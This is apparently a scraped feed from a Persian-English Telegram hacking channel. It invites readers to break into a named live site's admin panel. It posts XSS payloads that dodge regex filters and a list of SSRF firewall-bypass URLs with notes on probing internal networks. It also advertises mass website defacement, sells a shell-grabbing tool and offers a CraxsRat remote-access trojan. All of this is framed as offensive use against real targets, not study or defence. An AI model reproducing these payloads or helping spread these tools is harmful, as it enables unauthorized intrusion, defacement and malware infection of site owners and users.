0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.22K photos
122 videos
487 files
1.25K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
چالش

کشف ادمین پنل و نفوذ به ادمین پنل 👇👇

https://thangam5g.com

هرکی زد شات بده بهم

@Bvrce
با هوش مصنوعی مکالمه داشته باشید

GitHub

#Web #ai
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
1
Scripts Shop

GITHUB

Frontend > UiKit
Backend > Php

#web #shop
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
👍2
-$ rmdir 2024/

-$ mkdir 2025/
❤‍🔥17🆒2
WebSockets.pdf
230.3 KB
مقاله کامل درباره وب‌سوکت

منبع: پورت‌سوییگر
زبان: فارسی
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
T.me/imexemi
👍2
Xss Payload for bypass the regex filter with Obfuscate the alert value :

پیلود XSS برای دور زدن Regex Filter با Obfuscate کردن مقدار Alert:

<img src="X" onerror=top[8680439..toString(30)](1337)>

<script>top[8680439..toString(30)](1337)</script>


#bugbountyTips #xss
〰️〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍2
SSRF Payloads To Bypass Firewall

Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):

1) Bypass SSRF with CIDR:
http://127.127.127.127
http://127.0.0.0

2) Bypass using rare address:
http://127.1
http://0

3) Bypass using tricks combination:
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3

4) Bypass against a weak parser:
http://127.1.1.1:80\@127.2.2.2:80/

5) Bypass localhost with [:]:
http://[::1:80/
http://0000::1:80/

Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:

Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.

For example:
We discover that the following URL works:


https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000


We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network

#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍3💔3
A mini PDF !
want ?
👍23
How I hacked 100 hackers!

!رایتاپ چگونه 100 هکر را هک کردم


🔗link :
https://medium.com/@corneacristian/how-i-hacked-100-hackers-5c3c313e8a1a

#Hack #writeUp #medium
#هک #رایتاپ

♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
👍1
شل میخواید ؟
Anonymous Poll
78%
اره
22%
نوپ
👍1
Media is too big
VIEW IN TELEGRAM
Massdef

More than 40 website in 1 user

#hack #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLarCyberLab
@Bvrce
❤‍🔥3
Media is too big
VIEW IN TELEGRAM
Shellfinder.py

قدرت این ابزارو توی ویدیو مشاهده میکنید

قیمت 460 هستش تخفیف خورده شده ۳۵۰ 😉❤️

ابزار به همین صورت ترو تمیز پرقدرت تحویل شما داده میشه گرب کنید از زون اچ بدید بهش بزارید براتون رندل کنه شل بده بهتون عشق کنید



برای تهیه پیام بدین :
@Bvrce
t.me/KurtLarCyberLab
👍31
imem!
CraxsRats v4.9.5.rar
#CraxsRat #Craxs #Rat
V 7.4 will be update !


— Reaction Plus 😃✔️
👍11😁4